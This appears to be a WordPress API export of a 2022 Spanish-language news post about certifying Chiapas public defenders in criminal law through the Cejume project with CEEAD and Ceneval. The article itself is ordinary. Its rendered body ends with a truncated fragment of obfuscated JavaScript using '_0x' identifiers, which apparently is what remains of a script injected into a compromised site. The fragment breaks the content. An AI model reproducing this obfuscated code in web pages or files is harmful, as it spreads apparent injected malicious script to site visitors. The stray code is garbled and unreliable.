{"id":3026,"date":"2022-06-20T00:34:59","date_gmt":"2022-06-20T00:34:59","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3026"},"modified":"2022-06-20T00:35:00","modified_gmt":"2022-06-20T00:35:00","slug":"defensoras-y-defensores-publicos-del-poder-judicial-se-certificaran-en-materia-penal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3026","title":{"rendered":"Defensoras y defensores p\u00fablicos del Poder Judicial se certificar\u00e1n en materia penal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-19-at-3.03.07-PM-1.jpeg\" alt=\"\" class=\"wp-image-3027\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-19-at-3.03.07-PM-1.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-19-at-3.03.07-PM-1-225x300.jpeg 225w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>19 de Junio del 2022. Tuxtla Guti\u00e9rrez; Chiapas. &#8211; El Poder Judicial del Estado, que preside el magistrado presidente Juan \u00d3scar Trinidad Palacios, continua su compromiso por la capacitaci\u00f3n y profesionalizaci\u00f3n de las y los servidores p\u00fablicos, en beneficio de una mejor impartici\u00f3n de justicia en nuestra entidad.En este tenor, el Instituto de la Defensor\u00eda P\u00fablica en el Estado, que dirige Jorge Alberto Selvas Culebro, y el Centro de Estudios Sobre la Ense\u00f1anza y el Aprendizaje del Derecho, A.C. (Ceead), sostuvieron una reuni\u00f3n virtual para definir detalles de la certificaci\u00f3n de defensoras y defensores p\u00fablicos, esto, en el marco del proyecto de Certificaci\u00f3n para la Justicia en M\u00e9xico (Cejume).En esta reuni\u00f3n, donde participaron el director Jorge Alberto Selvas Culebro; la responsable de Vinculaci\u00f3n Institucional Ceedad; Mar\u00eda Paula Oma\u00f1a y el responsable de vinculaciones, Rodrigo Garc\u00eda Zavaleta se abord\u00f3 la invitaci\u00f3n a las y los defensores p\u00fablicos a realizar el proceso evaluativo de certificaci\u00f3n de defensa p\u00fablica en materia penal, a trav\u00e9s de un modelo de certificaci\u00f3n de competencias profesionales.Esta certificaci\u00f3n contempla la evaluaci\u00f3n de conocimientos y habilidades, mediante la aplicaci\u00f3n de ex\u00e1menes de conocimiento en diferentes \u00e1reas, que comprenden: proceso penal, teor\u00eda del delito, t\u00e9cnicas de litigaci\u00f3n oral, derechos humanos y debido proceso legal; adem\u00e1s, se examinar\u00e1 el desempe\u00f1o como capacitador\/a del sistema de justicia penal.Asimismo, se puntualiz\u00f3 el procedimiento del Centro Nacional de Evaluaci\u00f3n para la Educaci\u00f3n Superior (Ceneval), que realizar\u00e1 el Examen de Conocimientos del Sistema Penal Acusatorio para defensoras y defensores (Exmida), en coordinaci\u00f3n con el CEEAD.Adem\u00e1s, la Certificaci\u00f3n para la Justicia en M\u00e9xico (Cejume), cuyo prop\u00f3sito es contribuir a la consolidaci\u00f3n del Estado de Derecho, la democracia y la justicia social en M\u00e9xico, a trav\u00e9s de la formaci\u00f3n de profesionales del derecho con competencia t\u00e9cnica, \u00e9tica y compromiso con su entorno, esto con el apoyo y financiamiento de la Oficina Internacional de Asuntos Antinarc\u00f3ticos y Procuraci\u00f3n de Justicia (INL), del Departamento de los Estados Unidos de Am\u00e9rica. Finalmente, se acord\u00f3 establecer las rutas pertinentes para los tr\u00e1mites y entrega de certificaci\u00f3n a las y los defensores p\u00fablicos que cumplan con el proceso evaluativo.Cabe destacar que, este proceso de evaluaci\u00f3n y certificaci\u00f3n ya fue concluido por el titular de la Unidad T\u00e9cnica Especializada en el Sistema Acusatorio Penal del Instituto de la Defensor\u00eda Publica en el Estado.Direcci\u00f3n de Comunicaci\u00f3n Social y Relaciones P\u00fablicas61 7 87 00 Ext. 8020\/8021 f : \/poderjudicial.chiapas t : @PJE_Chiapas<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>19 de Junio del 2022. Tuxtla Guti\u00e9rrez; Chiapas. &#8211; El Poder Judicial del Estado, que preside el magistrado presidente Juan \u00d3scar Trinidad Palacios, continua su compromiso por la capacitaci\u00f3n y profesionalizaci\u00f3n de las y los servidores p\u00fablicos, en beneficio de una mejor impartici\u00f3n de justicia en nuestra entidad.En este tenor, el Instituto de la Defensor\u00eda &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3027,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-3026","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3026","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3026"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3026\/revisions"}],"predecessor-version":[{"id":3028,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3026\/revisions\/3028"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3027"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3026"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3026"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3026"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}